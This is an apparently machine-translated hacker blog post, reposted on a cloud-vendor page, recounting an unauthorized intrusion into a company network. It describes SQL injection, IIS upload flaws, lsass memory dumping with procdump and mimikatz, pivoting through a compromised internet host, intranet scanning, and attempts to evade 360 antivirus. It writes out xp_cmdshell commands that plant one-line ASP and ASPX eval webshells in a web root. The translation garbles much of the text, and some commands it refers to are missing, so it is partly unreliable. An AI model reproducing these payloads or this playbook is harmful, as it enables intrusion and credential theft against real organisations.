Record a broken win8 hacker infiltration attack

Source: Internet
Author: User

Record a broken win8 hacker infiltration attack

This is the case. If I have been an intern at Company A for A while, I WANT TO PENETRATE Company A, scan various tools, and finally find an injection point and get the background password, after logging in to the system, there is no usable place. The upload Period card is very strict. Even if the image is uploaded, you can browse the image, but you do not know the actual address of the image. There is no nearby station. Forget it, it's still paragraph c, which leads to the story below.

 

Yu Jian, wwwscan various scans, finally...

 

 

Company B's website source code, download it...

 

Obtain the background password:

Log on to the background, upload images in the ckfinder Editor, rename images, resolve IIS6.0 vulnerabilities, and use webshell.

Intranet, no database, it is estimated that the station library is separated

672 patches. It is estimated that the system vulnerabilities are gone. What should I do?

I am not very fond of Adding users directly. It is so dynamic that I should catch the password directly in the memory and use procdump. I feel that this is no virus attack, if you use other methods to block soft interceptions or fail to read data, this operation is generally successful.

Upload procdump, and then

Lsass. after the dmp is downloaded, it will be decrypted under win2003 for win2003, and for 32win8, it will be decrypted under win7. For 64-bit win8, it will be decrypted under 64-bit. Through this method, I have not failed, haha

 

 

On win003 Virtual Machine

The password is not unusual. The IP address of this host is 192.168.0.1.

Because I can only perform two-way port rebound on the Intranet

Find a previous Internet broiler with the ip address 58.215.65.xxx. Run the following command:

Run the following command on 192.168.0.1:

Then we can connect the Internet BOT:

 

OK connected ......!!!!!

 

Because it is an intranet, I used superscan to scan the port, and the network speed was a little slow. After all, I forwarded it.

192.168.0.1: 80

IP address 192.168.0.1: 3389

IP address 192.168.0.1: 139

192.168.0.28: 80

192.168.0.0.28: 139

192.168.0.0.28: 3306

192.168.0.29: 139

192.168.0.43: 139

192.168.0.88: 139

192.168.0.90: 3389

192.168.0.119: 80

192.168.0.119: 139

192.168.0.119: 1433

192.168.0.141: 139

192.168.0.144: 139

192.168.0.150: 139

192.168.0.164: 139

192.168.0.198: 139

192.168.0.198: 1433

192.168.0.207: 139

192.168.0.207: 80

192.168.0.207: 8080

192.168.0.209: 8080

192.168.0.253: 80

192.168.0.253: 139

192.168.0.253: 1433

192.168.0.253: 3389

192.168.0.254: 8080

 

I tried it when I saw 253 and opened 1433.

Good guy, good character. first introduce the following machine information: IP192.168.0.253 x86win8

But only some irrelevant commands can be executed...

It is estimated that it has been intercepted. Check the process.

360 was blocked. The U8 was checked by yonyou software. There was a story behind it. Since it was not for users, there were other good methods,

1. Replace sethc.exe

2.

3. Rejected

4.

5. Modify the security attributes: after a long wait, the system does not respond again. It is estimated that only 360 of the tasks can be solved.

6.

 

What should I do? Try image hijacking. expected .....

There is still no way, because it is in the LAN, You can first establish an ipc connection to transfer files, copy the dump files out, and then get the user name and password, just do it ..

My uncle failed again, and the penetration was tortuous. Especially for win8, what should I do, if the website is unavailable, write a sentence and pass it to procdump for execution. Then, download the dump file .....

 

Port 80 is opened. Find the root path.

No way. I wrote a file in c: \ inetpub \ wwwoot \.

Exec master. dbo. xp_mongoshell 'echo 1> c: \ inetpub \ wwwroot \ 1.txt ', which can be accessed on the zombie at 192.168.0.1 (the Internet cannot be accessed). If it succeeds, the root directory is c: \ inetpub \ wwwroot \, write a sentence...

Echo hello ^ <% eval request ("a") % ^> c: \ inetpub \ wwwroot \ 12.asp, access ..

Are you angry ???

Try writing An aspx chopper.

Echo ^ <% @ Page Language = "Jscript" validateRequest = "false" % ^> ^ <% Response. write (eval (Request. item ["w"], "unsafe"); % ^> aspx Test oo partition _ partition oo> c: \ inetpub \ wwwroot \ 1. aspx

The kitchen knife is successfully uploaded

However, the kitchen knife could only read things and could not upload files. I thought this was a horse problem. I should have uploaded another big horse but failed to upload it. I didn't continue searching for Writable Directories. This is a mistake.

 

Suddenly, I thought about how to try weak passwords for those accounts ..

A good show begins ...................

 

 

 

In addition to the complex administrator, the other passwords for these accounts are all accounts, but after I log in

It's stuck here until the usciio account is not completely waiting for it... I played it in a slow lens.

 

No weak password. First of all, I am not familiar with Ufida software. I want to help you.

 

Click print...

 

Click to find the printer ....

 

 

We can call various commands in the address bar or elsewhere.

Only the permission of this user is

UAC is also available on computers with limited functions, but this does not prevent us from writing a trojan. Find a writable directory and write a Trojan, then, you can use the sys permission of the database to move the Trojan horse to the root directory of the website.

 

 

The next step is to find the writable directory in the Trojan, upload the procdump to the server, and execute the lsass generated under the database's sys permission. dmp file, set lsass. the dmp file is uploaded back to the local machine and decrypted using mimitakz. Since the target machine is a 32-bit win8 host, it can be decrypted using 32-bit win7,

I am sorry for this small password, but now I am officially entering the forum to see why users cannot be added, there are still some twists and turns in this place. During the login process of the administrator, the user's login window will still be blocked. This is as long as you follow the above method, call the task manager, and then

Click "Connect" to log on. The button becomes grayed out because I have logged on to this location. Next I will add another user to see what the interception is ....

 

It's really a ghost of 360. So far, the penetration of this machine is here.

But how to break through the interception of 360 is still a long-standing problem, but it is successful because it can execute some commands.

Answer this question

 

 

QQ: 1563689034

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.